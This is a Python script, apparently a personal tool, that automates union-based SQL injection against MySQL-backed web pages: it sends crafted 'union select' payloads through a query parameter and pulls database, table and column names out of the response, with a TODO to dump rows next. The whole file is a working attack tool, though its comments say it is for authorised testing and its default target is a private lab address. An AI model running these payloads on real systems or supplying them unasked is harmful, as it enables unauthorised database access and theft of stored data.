
sqli自用腳本


# sqliIsSoEasy.py -- union-based MySQL SQL injection enumeration helper (authorised testing only)
import re
import sys
import urllib

import requests
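# --- payloads ---------------------------------------------------------------
# Every extracted value is wrapped in the byte markers 0x7177657E ("qwe~") and
# 0x7E717765 ("~qwe") so it can be picked out of an arbitrary HTML response.
# marker_re must match exactly that pair; change both together or nothing.
marker_re = re.compile(r"qwe~(.+?)~qwe")

# Names typed by the operator are spliced into the SQL below inside single
# quotes, so only characters that cannot close the quote are accepted.
safe_name_re = re.compile(r"\A[A-Za-z0-9_$]+\Z")

payload = {}

# Lists every schema.  "1 and 1=2" suppresses the target's own row so only the
# UNIONed rows are reflected.  Assumes the vulnerable query selects two
# columns; adjust the column count if the target differs.
payload_db = ("1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) "
              "from INFORMATION_SCHEMA.SCHEMATA")

# Templates: the {database_name} / {table_name} placeholders are filled by
# fillPayload().  (The original concatenated variables that did not exist at
# import time, so the module never loaded.)
payload_tb = ("1 union select 1,concat(0x7177657E,table_name,0x7E717765) "
              "from information_schema.tables where table_schema='{database_name}'")
# NOTE: filters on table_name only, so identically named tables in other
# schemas contribute their columns as well.
payload_col = ("1 union select 1,concat(0x7177657E,column_name,0x7E717765) "
               "from information_schema.columns where table_name='{table_name}'")


def isSafeName(name):
    """Return True when *name* is made only of [A-Za-z0-9_$] (no quotes, spaces, comments)."""
    return bool(safe_name_re.match(name))


def fillPayload(template, **names):
    """Return *template* with its {placeholders} filled from *names*.

    Raises ValueError when a name fails isSafeName(): the names land inside
    single quotes in the injected SQL, and a stray quote would break -- or
    silently widen -- the query.
    """
    for key, value in names.items():
        if not isSafeName(value):
            raise ValueError("unsafe %s %r: only letters, digits, _ and $ are allowed" % (key, value))
    return template.format(**names)


def extractMarked(text):
    """Return every value found between qwe~ and ~qwe in *text* (empty list when none)."""
    return marker_re.findall(text)


def visitUrlByUnion(url, payload, param="id", timeout=10):
    """GET *url* with *payload* as query parameter *param* and return the marked
    values reflected in the body.

    Returns an empty list when nothing is reflected (the original returned
    None here, which crashed the callers' for loops).  Only reflected
    union-based injection is detected; blind or error-based cases always come
    back empty.  The original urlencoded an undefined dict and never used
    *payload*, and the injectable parameter name is not recoverable from it --
    "id" is a placeholder, pass param=... for the real one.  *timeout* keeps a
    hung target from blocking forever.
    """
    response = requests.get(url, params={param: payload}, timeout=timeout)
    # .text rather than .content: the regex is a str pattern and .content is
    # bytes on Python 3.
    return extractMarked(response.text)


def _ask(prompt):
    """Read one line from the operator, stripped of surrounding whitespace."""
    try:
        reader = raw_input  # Python 2
    except NameError:
        reader = input      # Python 3
    return reader(prompt).strip()


def _show(title, names):
    """Print *title*, then *names* space separated, then a blank line."""
    print(title)
    print(" ".join(names))
    print("")


def getDBName(url, param="id"):
    """Print and return the schema names reachable through *url*."""
    names = visitUrlByUnion(url, payload_db, param=param)
    _show("The databases:", names)
    return names


def getTBName(url, param="id"):
    """Ask for a schema name, then print and return its table names.

    Raises ValueError if the typed name is not a safe identifier.
    """
    database_name = _ask("please input your database:")
    query = fillPayload(payload_tb, database_name=database_name)
    names = visitUrlByUnion(url, query, param=param)
    _show("The tables:", names)
    return names


def getCOLName(url, param="id"):
    """Ask for a table name, then print and return its column names.

    Raises ValueError if the typed name is not a safe identifier.
    """
    table_name = _ask("please input your table:")
    query = fillPayload(payload_col, table_name=table_name)
    names = visitUrlByUnion(url, query, param=param)
    _show("The columns:", names)
    # TODO: dump the rows once the columns are known; the original stopped here.
    return names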

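if __name__ == '__main__':
    # Only run this against systems you are authorised to test.  The default
    # is the author's lab VM; a different target can be given as argv[1].
    url = sys.argv[1] if len(sys.argv) > 1 else 'http://192.168.106.130/config/sql.php'
    getDBName(url)
    getTBName(url)
    getCOLName(url)  # the original called getColName(), which was never defined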

  
